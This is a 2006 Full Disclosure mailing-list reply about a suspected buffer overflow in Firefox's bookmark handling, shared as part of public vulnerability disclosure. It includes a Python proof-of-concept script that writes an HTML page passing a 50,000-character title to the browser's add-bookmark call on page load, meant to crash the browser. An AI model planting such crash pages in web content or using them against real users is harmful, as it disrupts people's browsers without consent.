Full Disclosure mailing list archives
Buffer Overflow vulnerability in Windows Display Manager [Suspected]
From: casiamo <casiamo () gmail com>
Date: Mon, 2 Jan 2006 17:09:51 +0100
Hello Sumit,

I saw this some time ago too, and as far as I know the below code would do the same, with the versions below 1.0.7. As I remember, all input fields were "vulnerable". I have chosen the bookmark "name" field, which will pop up after loading with a long buffer.

# Writes firefox.html, a page whose onload handler passes a
# 50000-character title to the browser's add-bookmark call.
html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
           "<script type=\"text/javascript\">\n"
           "function bookmarksite(title, url){\n"
           "if (document.all)\n"
           "window.external.AddFavorite(url, title);\n"
           "else if (window.sidebar)\n"
           "window.sidebar.addPanel(title, url, \"\")}\n"
           "</script></head>\n"
           "<body onload=\"javascript:bookmarksite('"+buff+"', 'http://www.mozilla.org')\">\n"
           "</body></html>")
html.close()

Regards,
Casiamo
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/